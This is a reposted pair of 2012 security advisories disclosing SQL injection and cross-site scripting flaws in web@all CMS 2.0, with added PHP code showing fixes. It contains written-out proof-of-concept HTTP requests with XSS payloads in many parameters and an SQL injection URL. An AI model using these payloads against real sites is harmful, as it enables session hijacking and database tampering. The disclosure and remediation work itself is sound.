web@all CMS 2.0: multiple vulnerabilities and fixes

Source: Internet
Author: User

web@all CMS 2.0 (_order) SQL Injection Vulnerability

Developer: web@all
Official Website: http://www.webatall.org
Affected Versions: 2.0

Summary: web@all is a PHP content management system (CMS). If you
know about it, you nearly can use it to do anything.

Desc: The application suffers from an SQL Injection vulnerability.
Input passed via the GET parameter '_order' is not properly sanitised
before being returned to the user or used in SQL queries. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a

Vulnerability discovered by Gjoko 'liquidworm' Krstic
                            @zeroscience

Advisory ID: ZSL-2012-5099
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5099.php

21.08.2012
 

 
---

http://www.2cto.com/webatall/sys/index.php?_key=author&_order=1[SQL ATTACK QUERY]&_text[status]=-1&_type[]=0&mod=article
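
One way to close the '_order' injection, shown as an added example that is not web@all's own code: column names and sort directions cannot be bound as query parameters, so both are mapped through an allowlist, while filter values are bound. It assumes '_key' selects the sort column and '_order' the direction, which the advisory does not state; the article table, its columns and the function names are hypothetical.

```php
<?php
// Added example with hypothetical names; not code from web@all.

/** Map request input to a fixed ORDER BY clause; unknown values get defaults. */
function build_order_by($key, $order): string
{
    // Request value => SQL identifier. Only these identifiers reach the query.
    $columns = ['title' => 'title', 'author' => 'author', 'timeadd' => 'timeadd'];
    // is_string() also rejects array input such as ?_key[]=x.
    $column = (is_string($key) && array_key_exists($key, $columns))
        ? $columns[$key]
        : 'timeadd';
    // Strict comparison: '1' followed by any other text is not '1'.
    $direction = ($order === '1') ? 'DESC' : 'ASC';
    return "ORDER BY $column $direction";
}

/** List articles: the filter value is bound, the sort clause is allowlisted. */
function list_articles(PDO $db, array $get): array
{
    $status = $get['_text']['status'] ?? null;
    $stmt = $db->prepare(
        'SELECT title, author FROM article WHERE status = :status '
        . build_order_by($get['_key'] ?? null, $get['_order'] ?? null)
    );
    // Bound as an integer, so the value never becomes part of the SQL text.
    $stmt->bindValue(':status', is_scalar($status) ? (int) $status : 0, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// Constructed data and requests, run against an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE article (title TEXT, author TEXT, timeadd INTEGER, status INTEGER)');
$db->exec("INSERT INTO article VALUES ('Beta', 'zoe', 2, 1), ('Alpha', 'amy', 1, 1)");

$requests = [
    ['_key' => 'author', '_order' => '1', '_text' => ['status' => '1']],
    // Extra text appended to _order: the clause falls back to ASC.
    ['_key' => 'author', '_order' => '1 [appended text]', '_text' => ['status' => '1']],
];
foreach ($requests as $get) {
    echo json_encode(list_articles($db, $get)), "\n";
}
```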
 

 
======================================================================================================

web@all CMS 2.0 Multiple Remote XSS Vulnerabilities

Vendor: web@all
Product web page: http://www.webatall.org
Affected version: 2.0

Summary: web@all is a PHP content management system (CMS). If you
know about it, you nearly can use it to do anything.

Desc: web@all CMS suffers from multiple stored and reflected cross-site
scripting vulnerabilities. The issues are triggered when input passed
via several parameters to several scripts is not properly sanitized before
being returned to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in context of an affected site.
 

 
----------------------------------------------------------------------------
  #    Parameter           Method      Module          Type
----------------------------------------------------------------------------

  1.   act                 POST        member          Reflected
  2.   security            POST        member          Reflected
  3.   username            POST        member          Reflected
  4.   id                  GET         article         Reflected
  5.   mod                 GET/POST    member          Reflected
  6.   _flag               GET         article         Reflected
  7.   _text[]             GET         article         Reflected
  8.   _text[alias]        GET         article         Reflected
  9.   _text[category]     GET         article         Reflected
 10.   _text[email]        GET         member          Reflected
 11.   _text[title]        GET         article         Reflected
 12.   _text[username]     GET         article         Reflected
 13.   _text[timeadd]      GET         member          Reflected
 14.   title               POST        article/cron    Stored
 15.   description         POST        cron            Stored

----------------------------------------------------------------------------
 

 
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a

Vulnerability discovered by Gjoko 'liquidworm' Krstic
                            @zeroscience

Advisory ID: ZSL-2012-5098
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5098.php

21.08.2012

---
 

 

 
Reflected:
----------

POST /webatall/sys/action.php HTTP/1.1
Content-Length: 154
Content-Type: application/x-www-form-urlencoded
Cookie: guest=A0; _WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

act=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28900164%29%29%3e&goto=%2fsys&mod=member&password=Password&security=1&submit=Sign%20in&username=Username


POST /webatall/sys/action.php HTTP/1.1
Content-Length: 154
Content-Type: application/x-www-form-urlencoded
Cookie: guest=A0; _WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

act=signin&goto=%2fsys&mod=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28920000%29%3e&password=Password&security=1&submit=Sign%20in&username=Username


POST /webatall/sys/action.php HTTP/1.1
Content-Length: 159
Content-Type: application/x-www-form-urlencoded
Cookie: guest=A0; _WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

act=signin&goto=%2fsys&mod=member&password=Password&security=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28964492%29%3e&submit=Sign%20in&username=Username


POST /webatall/sys/action.php HTTP/1.1
Content-Length: 147
Content-Type: application/x-www-form-urlencoded
Cookie: guest=A0; _WA:auth=1; auth=2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

act=signin&goto=%2fsys&mod=member&password=admin&security=1&submit=Sign+in&username=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28913398%29%3e


GET /webatall/sys/index.php?_flag=&_key=title&_order=&_text%5b%5d=&_text%5bcategory%5d=&_text%5bstatus%5d=-1&_type%5b%5d=0&id=%22%20onmouseover%3dprompt%28940245%29%20bad%3d%22&mod=article

GET /webatall/sys/index.php?_text[timeadd]=1345564800&_type[timeadd]=2&mod=1%3cdiv%20style%3dwidth%3aexpression%28prompt%28961358%29%3e

GET /webatall/sys/index.php?_flag=%22%20onmouseover%3dprompt%28916116%29%20bad%3d%22&_key=title&_order=&_text%5b%5d=&_text%5bcategory%5d=&_text%5bstatus%5d=-1&_type%5b%5d=0&id=&mod=article

GET /webatall/sys/index.php?_flag=&_key=title&_order=&_text%5b%5d=%22%20onmouseover%3dprompt%28965775%29%20bad%3d%22&_text%5bcategory%5d=&_text%5bstatus%5d=-1&_type%5b%5d=0&id=&mod=article

GET /webatall/sys/index.php?_text%5balias%5d=%22%20onmouseover%3dprompt%28989568%29%20bad%3d%22&_type%5balias%5d=0&mod=article

GET /webatall/sys/index.php?_flag=&_key=title&_order=&_text%5b%5d=&_text%5bcategory%5d=%22%20onmouseover%3dprompt%28926119%29%20bad%3d%22&_text%5bstatus%5d=-1&_type%5b%5d=0&id=&mod=article

GET /webatall/sys/index.php?_text%5bemail%5d=%22%20onmouseover%3dprompt%28999602%29%20bad%3d%22&_type%5bemail%5d=0&mod=member

GET /webatall/sys/index.php?_text%5btitle%5d=%22%20onmouseover%3dprompt%28927731%29%20bad%3d%22&_type%5btitle%5d=0&mod=article

GET /webatall/sys/index.php?_text%5busername%5d=%22%20onmouseover%3dprompt%28926119%29%20bad%3d%22&_type%5busername%5d=0&mod=member

GET /webatall/sys/index.php?_text[timeadd]=%22%20onmouseover%3dprompt%28929079%29%20bad%3d%22&_type[timeadd]=2&mod=member
 

 

 

 
Stored:
-------

POST http://www.2cto.com/webatall/sys/action.php HTTP/1.1

act               sys_add
author            test
category_id       1
content           test
content_key       test
copyright         test
files
id
lang
menu
meta_description  test
meta_keywords     test
mod               article
options           test
status            1
thumbs            test
title             "><script>alert(1);</script>


POST http://localhost/webatall/sys/action.php HTTP/1.1

act               sys_add
cron              delete_unpaid_transaction.php
description       "><script>alert(2);</script>
id
menu
mod               cron
run_interval
status            1
title             "><script>alert(3);</script>
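
The requests above use two shapes of input, a quoted-attribute breakout and an injected element, and the stored cases are the same data echoed back from the database. The following added example, which is not web@all's own code, shows output encoding plus input validation that covers both shapes; the helper names and the rendered markup are hypothetical, and the module allowlist is taken from the table above.

```php
<?php
// Added example with hypothetical helpers; not code from web@all.

/** Encode a value for HTML element content or a quoted attribute value. */
function e($value): string
{
    // Array input (e.g. _text[]=...) is never rendered as text.
    if (!is_scalar($value)) {
        return '';
    }
    // ENT_QUOTES encodes both quote characters, so attributes cannot be closed.
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Module names listed in the advisory's table; anything else gets a default. */
function clean_mod($mod): string
{
    return in_array($mod, ['article', 'member', 'cron'], true) ? $mod : 'article';
}

/** Numeric record id, or null when the parameter is not a plain integer. */
function clean_id($id): ?int
{
    return (is_string($id) && ctype_digit($id)) ? (int) $id : null;
}

/** Echo a filter value back into a form field, as a list view would. */
function render_filter_input(string $name, $value): string
{
    return '<input type="text" name="' . e($name) . '" value="' . e($value) . '">';
}

// Constructed inputs in the two shapes used above; MARKER stands in for the
// script content. The same e() call applies to stored title/description
// values when they are read back from the database and printed.
$attr_breakout = '" onmouseover=MARKER bad="';
$tag_injection = '1<div style=MARKER>';

echo render_filter_input('_text[title]', $attr_breakout), "\n";
echo '<p>Module: ', e($tag_injection), ' / ', clean_mod($tag_injection), "</p>\n";
var_dump(clean_id($attr_breakout), clean_id('42'));
```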
 
